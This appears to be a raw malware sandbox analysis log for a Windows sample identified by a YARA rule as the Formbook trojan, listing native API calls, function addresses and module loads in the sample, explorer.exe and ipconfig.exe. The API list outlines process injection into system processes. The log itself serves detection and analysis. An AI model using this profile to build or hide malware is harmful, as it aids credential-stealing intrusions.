              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2FB0 NtResumeThread,4_2_039A2FB0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2FA0 NtQuerySection,4_2_039A2FA0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2F60 NtCreateProcessEx,4_2_039A2F60
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2E80 NtReadVirtualMemory,4_2_039A2E80
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2EE0 NtQueueApcThread,4_2_039A2EE0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2E30 NtWriteVirtualMemory,4_2_039A2E30
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2DB0 NtEnumerateKey,4_2_039A2DB0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2D00 NtSetInformationFile,4_2_039A2D00
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2D30 NtUnmapViewOfSection,4_2_039A2D30
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2CC0 NtQueryVirtualMemory,4_2_039A2CC0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2CF0 NtOpenProcess,4_2_039A2CF0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2C00 NtQueryInformationProcess,4_2_039A2C00
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A3090 NtSetValueKey,4_2_039A3090
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A3010 NtOpenDirectoryObject,4_2_039A3010
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A39B0 NtGetContextThread,4_2_039A39B0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A3D10 NtOpenProcessToken,4_2_039A3D10
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A3D70 NtOpenThread,4_2_039A3D70
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310A360 NtCreateFile,4_2_0310A360
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310A410 NtReadFile,4_2_0310A410
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310A490 NtClose,4_2_0310A490
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310A35C NtCreateFile,4_2_0310A35C
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310A40B NtReadFile,4_2_0310A40B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CE10260_2_00CE1026
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CE10300_2_00CE1030
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFE1E50_2_00CFE1E5
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFDAE60_2_00CFDAE6
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFE2660_2_00CFE266
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CE12080_2_00CE1208
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFDB920_2_00CFDB92
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFDD870_2_00CFDD87
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CE2D900_2_00CE2D90
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFD5A30_2_00CFD5A3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFE5B40_2_00CFE5B4
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFDEB90_2_00CFDEB9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CE9E600_2_00CE9E60
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CE2FB00_2_00CE2FB0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018501AA0_2_018501AA
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018481CC0_2_018481CC
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017801000_2_01780100
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182A1180_2_0182A118
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018181580_2_01818158
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018220000_2_01822000
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018503E60_2_018503E6
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179E3F00_2_0179E3F0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184A3520_2_0184A352
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018102C00_2_018102C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018302740_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018505910_2_01850591
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017905350_2_01790535
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0183E4F60_2_0183E4F6
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018344200_2_01834420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018424460_2_01842446
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017907700_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B47500_2_017B4750
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178C7C00_2_0178C7C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AC6E00_2_017AC6E0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A69620_2_017A6962
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0185A9A60_2_0185A9A6
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A00_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179A8400_2_0179A840
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017928400_2_01792840
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE8F00_2_017BE8F0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017768B80_2_017768B8
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01846BD70_2_01846BD7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184AB400_2_0184AB40
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178EA800_2_0178EA80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179AD000_2_0179AD00
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178ADE00_2_0178ADE0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182CD1F0_2_0182CD1F
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A8DBF0_2_017A8DBF
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830CB50_2_01830CB5
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790C000_2_01790C00
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01780CF20_2_01780CF2
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180EFA00_2_0180EFA0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B0F300_2_017B0F30
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017D2F280_2_017D2F28
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179CFE00_2_0179CFE0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01782FC80_2_01782FC8
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01832F300_2_01832F30
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01804F400_2_01804F40
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184CE930_2_0184CE93
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790E590_2_01790E59
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184EEDB0_2_0184EEDB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184EE260_2_0184EE26
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A2E900_2_017A2E90
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177F1720_2_0177F172
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C516C0_2_017C516C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179B1B00_2_0179B1B0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0185B16B0_2_0185B16B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0183F0CC0_2_0183F0CC
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184F0E00_2_0184F0E0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018470E90_2_018470E9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017970C00_2_017970C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177D34C0_2_0177D34C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184132D0_2_0184132D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017D739A0_2_017D739A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018312ED0_2_018312ED
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AB2C00_2_017AB2C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017952A00_2_017952A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182D5B00_2_0182D5B0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018475710_2_01847571
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017814600_2_01781460
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184F43F0_2_0184F43F
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184F7B00_2_0184F7B0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018416CC0_2_018416CC
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017999500_2_01799950
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AB9500_2_017AB950
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018259100_2_01825910
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FD8000_2_017FD800
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017938E00_2_017938E0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01805BF00_2_01805BF0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017CDBF90_2_017CDBF9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184FB760_2_0184FB76
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AFB800_2_017AFB80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01831AA30_2_01831AA3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182DAAC0_2_0182DAAC
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0183DAC60_2_0183DAC6
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01847A460_2_01847A46
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184FA490_2_0184FA49
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017D5AA00_2_017D5AA0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01803A6C0_2_01803A6C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01793D400_2_01793D40
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AFDC00_2_017AFDC0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01841D5A0_2_01841D5A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01847D730_2_01847D73
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184FCF20_2_0184FCF2
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01809C320_2_01809C32
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184FFB10_2_0184FFB1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184FF090_2_0184FF09
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01753FD50_2_01753FD5
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01753FD20_2_01753FD2
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01791F920_2_01791F92
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01799EB00_2_01799EB0
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D32322_2_0E4D3232
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D20362_2_0E4D2036
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4C90822_2_0E4C9082
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4CAD022_2_0E4CAD02
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D09122_2_0E4D0912
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4CDB302_2_0E4CDB30
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4CDB322_2_0E4CDB32
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D65CD2_2_0E4D65CD
              Source: C:\Windows\explorer.exeCode function: 2_2_105EB0362_2_105EB036
              Source: C:\Windows\explorer.exeCode function: 2_2_105E20822_2_105E2082
              Source: C:\Windows\explorer.exeCode function: 2_2_105E99122_2_105E9912
              Source: C:\Windows\explorer.exeCode function: 2_2_105E3D022_2_105E3D02
              Source: C:\Windows\explorer.exeCode function: 2_2_105EF5CD2_2_105EF5CD
              Source: C:\Windows\explorer.exeCode function: 2_2_105EC2322_2_105EC232
              Source: C:\Windows\explorer.exeCode function: 2_2_105E6B322_2_105E6B32
              Source: C:\Windows\explorer.exeCode function: 2_2_105E6B302_2_105E6B30
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A303E64_2_03A303E6
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0397E3F04_2_0397E3F0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2A3524_2_03A2A352
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039F02C04_2_039F02C0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A102744_2_03A10274
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A241A24_2_03A241A2
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A301AA4_2_03A301AA
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A281CC4_2_03A281CC
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039601004_2_03960100
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A0A1184_2_03A0A118
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039F81584_2_039F8158
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A020004_2_03A02000
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0396C7C04_2_0396C7C0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039947504_2_03994750
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039707704_2_03970770
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0398C6E04_2_0398C6E0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A305914_2_03A30591
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039705354_2_03970535
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A1E4F64_2_03A1E4F6
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A144204_2_03A14420
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A224464_2_03A22446
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A26BD74_2_03A26BD7
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2AB404_2_03A2AB40
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0396EA804_2_0396EA80
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A3A9A64_2_03A3A9A6
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039729A04_2_039729A0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039869624_2_03986962
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039568B84_2_039568B8
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0399E8F04_2_0399E8F0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039728404_2_03972840
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0397A8404_2_0397A840
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039EEFA04_2_039EEFA0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03962FC84_2_03962FC8
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0397CFE04_2_0397CFE0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A12F304_2_03A12F30
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03990F304_2_03990F30
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039B2F284_2_039B2F28
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039E4F404_2_039E4F40
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03982E904_2_03982E90
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2CE934_2_03A2CE93
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2EEDB4_2_03A2EEDB
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2EE264_2_03A2EE26
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03970E594_2_03970E59
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03988DBF4_2_03988DBF
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0396ADE04_2_0396ADE0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0397AD004_2_0397AD00
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A0CD1F4_2_03A0CD1F
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A10CB54_2_03A10CB5
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03960CF24_2_03960CF2
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03970C004_2_03970C00
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039B739A4_2_039B739A
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2132D4_2_03A2132D
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0395D34C4_2_0395D34C
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039752A04_2_039752A0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A112ED4_2_03A112ED
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0398B2C04_2_0398B2C0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0397B1B04_2_0397B1B0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A3B16B4_2_03A3B16B
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0395F1724_2_0395F172
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A516C4_2_039A516C
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2F0E04_2_03A2F0E0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A270E94_2_03A270E9
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039770C04_2_039770C0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A1F0CC4_2_03A1F0CC
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2F7B04_2_03A2F7B0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A216CC4_2_03A216CC
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039B56304_2_039B5630
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A0D5B04_2_03A0D5B0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A275714_2_03A27571
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2F43F4_2_03A2F43F
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039614604_2_03961460
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0398FB804_2_0398FB80
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039ADBF94_2_039ADBF9
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039E5BF04_2_039E5BF0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2FB764_2_03A2FB76
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A11AA34_2_03A11AA3
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A0DAAC4_2_03A0DAAC
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039B5AA04_2_039B5AA0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A1DAC64_2_03A1DAC6
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A27A464_2_03A27A46
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2FA494_2_03A2FA49
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039E3A6C4_2_039E3A6C
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A059104_2_03A05910
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039799504_2_03979950
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0398B9504_2_0398B950
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039738E04_2_039738E0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039DD8004_2_039DD800
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03971F924_2_03971F92
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2FFB14_2_03A2FFB1
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2FF094_2_03A2FF09
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03979EB04_2_03979EB0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0398FDC04_2_0398FDC0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A27D734_2_03A27D73
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03973D404_2_03973D40
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A21D5A4_2_03A21D5A
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2FCF24_2_03A2FCF2
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039E9C324_2_039E9C32
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310E2664_2_0310E266
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310E1E54_2_0310E1E5
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310E5B44_2_0310E5B4
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030F2FB04_2_030F2FB0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030F2D904_2_030F2D90
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310D5A34_2_0310D5A3
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310DB924_2_0310DB92
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310DAE64_2_0310DAE6
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030F9E604_2_030F9E60
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310DEB94_2_0310DEB9
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310DD874_2_0310DD87
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 039DEA12 appears 86 times
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0395B970 appears 280 times
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 039B7E54 appears 103 times
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 039A5130 appears 58 times
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 039EF290 appears 105 times
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: String function: 0177B970 appears 278 times
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: String function: 017D7E54 appears 102 times
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: String function: 0180F290 appears 105 times
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: String function: 017FEA12 appears 86 times
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: String function: 017C5130 appears 58 times
              Source: i5NDVAFg42.exeStatic PE information: No import functions for PE file found
              Source: i5NDVAFg42.exe, 00000000.00000002.2046841117.0000000001AD7000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs i5NDVAFg42.exe
              Source: i5NDVAFg42.exe, 00000000.00000003.1989066813.00000000016D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs i5NDVAFg42.exe
              Source: i5NDVAFg42.exe, 00000000.00000002.2046523999.000000000187D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs i5NDVAFg42.exe
              Source: i5NDVAFg42.exe, 00000000.00000003.2044767474.0000000001245000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs i5NDVAFg42.exe
              Source: i5NDVAFg42.exe, 00000000.00000003.1987282372.0000000001516000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs i5NDVAFg42.exe
              Source: i5NDVAFg42.exe, 00000000.00000003.2044525388.000000000123F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs i5NDVAFg42.exe
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wininet.dllJump to behavior
              Source: i5NDVAFg42.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: i5NDVAFg42.exe, type: SAMPLEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
